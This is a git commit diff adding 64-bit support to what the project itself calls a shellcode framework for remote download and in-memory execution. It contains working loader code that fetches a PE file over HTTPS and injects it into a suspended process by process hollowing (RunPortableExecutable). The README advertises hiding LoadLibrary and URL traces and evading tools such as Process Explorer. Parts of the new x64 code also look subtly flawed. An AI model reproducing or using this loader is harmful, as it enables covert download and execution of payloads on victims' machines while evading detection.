添加x64支持
This commit is contained in:
parent
f2a79f5e05
commit
12a917c5db
Binary file not shown.
|
@ -117,6 +117,7 @@ int _tmain(int argc, _TCHAR* argv[])
|
|||
|
||||
int _tmain(int argc, _TCHAR* argv[])
|
||||
{
|
||||
|
||||
#endif
|
||||
|
||||
|
||||
|
|
|
@ -159,6 +159,11 @@
|
|||
<AdditionalDependencies>user32.lib;winhttp.lib;msvcrt.lib;</AdditionalDependencies>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PreprocessorDefinitions>_DEBUG</PreprocessorDefinitions>
|
||||
</ClCompile>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="api.h" />
|
||||
<ClInclude Include="hash.h" />
|
||||
|
|
|
@ -1,10 +1,15 @@
|
|||
#include "ShellCode.h"
|
||||
|
||||
//加载起始函数,跳转到入口函数
|
||||
#ifdef _WIN64
|
||||
VOID mmLoaderSCStart(){
|
||||
Strat();
|
||||
#else
|
||||
VOID _declspec(naked) mmLoaderSCStart()
|
||||
{
|
||||
|
||||
__asm jmp Strat;
|
||||
#endif
|
||||
}
|
||||
|
||||
|
||||
|
@ -49,7 +54,7 @@ public:
|
|||
|
||||
|
||||
//提取项目的main文件,StartSCode相当于项目的main函数
|
||||
void __stdcall StartSCode(char * URL)
|
||||
void __stdcall StartSCode()
|
||||
{
|
||||
|
||||
|
||||
|
@ -62,7 +67,7 @@ public:
|
|||
|
||||
int size = HttpDownload(host, path, 443, TRUE);
|
||||
|
||||
fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
|
||||
//fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
|
||||
|
||||
RunPortableExecutable();
|
||||
|
||||
|
@ -75,15 +80,21 @@ public:
|
|||
};
|
||||
|
||||
//sehllcode入口函数
|
||||
void __stdcall Strat(char * URL)
|
||||
void __stdcall Strat()
|
||||
{
|
||||
//由于需要模拟全局变量,所以使用类包裹下
|
||||
RmExecute runclass;
|
||||
|
||||
runclass.StartSCode(URL);
|
||||
runclass.StartSCode();
|
||||
}
|
||||
#ifdef _WIN64
|
||||
void mmLoaderSCEnd()
|
||||
{
|
||||
|
||||
#else
|
||||
void __declspec(naked) mmLoaderSCEnd()
|
||||
{
|
||||
|
||||
__asm int 3;
|
||||
#endif
|
||||
}
|
|
@ -9,7 +9,7 @@
|
|||
EXTERN_C VOID
|
||||
mmLoaderSCStart();//这里用来表明shellcode的开始
|
||||
|
||||
void __stdcall Strat(char * URL);//入口函数main
|
||||
void __stdcall Strat();//入口函数main
|
||||
|
||||
EXTERN_C VOID
|
||||
mmLoaderSCEnd();//与开头对应的结尾
|
|
@ -311,7 +311,73 @@ int RmExecute::HttpDownload(wchar_t* target, wchar_t* path, INTERNET_PORT port,B
|
|||
return dwLast;
|
||||
}
|
||||
|
||||
#ifdef _WIN64
|
||||
bool RmExecute::RunPortableExecutable() {
|
||||
IMAGE_DOS_HEADER* DOSHeader; // For Nt DOS Header symbols
|
||||
IMAGE_NT_HEADERS* NtHeader; // For Nt PE Header objects & symbols
|
||||
IMAGE_SECTION_HEADER* SectionHeader;
|
||||
|
||||
PROCESS_INFORMATION PI;
|
||||
STARTUPINFOA SI;
|
||||
|
||||
CONTEXT* CTX;
|
||||
|
||||
ULONG_PTR* ImageBase; //Base address of the image
|
||||
void* pImageBase; // Pointer to the image base
|
||||
|
||||
int count;
|
||||
char CurrentFilePath[1024];
|
||||
|
||||
DOSHeader = PIMAGE_DOS_HEADER(newbuff); // Initialize Variable
|
||||
NtHeader = PIMAGE_NT_HEADERS(ULONG_PTR(newbuff) + DOSHeader->e_lfanew); // Initialize
|
||||
|
||||
GetModuleFileNameA(0, CurrentFilePath, 1024); // path to current executable
|
||||
|
||||
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // Check if image is a PE File.
|
||||
{
|
||||
ZeroMemory(&PI, sizeof(PI)); // Null the memory
|
||||
ZeroMemory(&SI, sizeof(SI)); // Null the memory
|
||||
|
||||
if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE,
|
||||
CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) // Create a new instance of current
|
||||
//process in suspended state, for the new image.
|
||||
{
|
||||
// Allocate memory for the context.
|
||||
CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
|
||||
CTX->ContextFlags = CONTEXT_FULL; // Context is allocated
|
||||
|
||||
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread
|
||||
{
|
||||
// Read instructions
|
||||
ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Rbx + 8), LPVOID(&ImageBase), 4, 0);
|
||||
|
||||
pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
|
||||
NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
|
||||
|
||||
// Write the image to the process
|
||||
WriteProcessMemory(PI.hProcess, pImageBase, newbuff, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
|
||||
|
||||
for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++)
|
||||
{
|
||||
SectionHeader = PIMAGE_SECTION_HEADER(ULONG_PTR(newbuff) + DOSHeader->e_lfanew + 248 + (ULONG_PTR)(count * 40));
|
||||
|
||||
WriteProcessMemory(PI.hProcess, LPVOID(ULONG_PTR(pImageBase) + SectionHeader->VirtualAddress),
|
||||
LPVOID(ULONG_PTR(newbuff) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
|
||||
}
|
||||
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Rbx + 8),
|
||||
LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);
|
||||
|
||||
// Move address of entry point to the rax register
|
||||
CTX->Rax = ULONG_PTR(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
|
||||
SetThreadContext(PI.hThread, LPCONTEXT(CTX));
|
||||
ResumeThread(PI.hThread);
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
#else
|
||||
bool RmExecute::RunPortableExecutable()
|
||||
{
|
||||
|
||||
|
@ -379,3 +445,4 @@ bool RmExecute::RunPortableExecutable()
|
|||
}
|
||||
return false;
|
||||
}
|
||||
#endif
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
Remote Download and Memory Execute for shellcode framework
|
||||
|
||||
远程下载并内存加载的ShellCode框架,暂不支持X64
|
||||
远程下载并内存加载的ShellCode框架,已经支持x64
|
||||
|
||||
# 参(抄)考(袭)项目
|
||||
|
||||
|
@ -63,10 +63,6 @@ pfn->fnMessageBoxA = (pfnMessageBoxA)GetProcAddressWithHash(HASH_MessageBoxA);
|
|||
|
||||
隐藏loadlibrary特征和url特征,更不容易被发现
|
||||
|
||||
## X64支持
|
||||
|
||||
自行调试`Tool.h->RunPortableExecutable`函数,大概就是加个X64宏把EAX什么换成RAX(应该
|
||||
|
||||
## 反射DLL加载技术
|
||||
|
||||
完全不使用LoadLibrary,ProcessExplorer、procexp64等工具无法检测到这个dll,同时让程序变得模块化
|
||||
|
|
Loading…
Reference in New Issue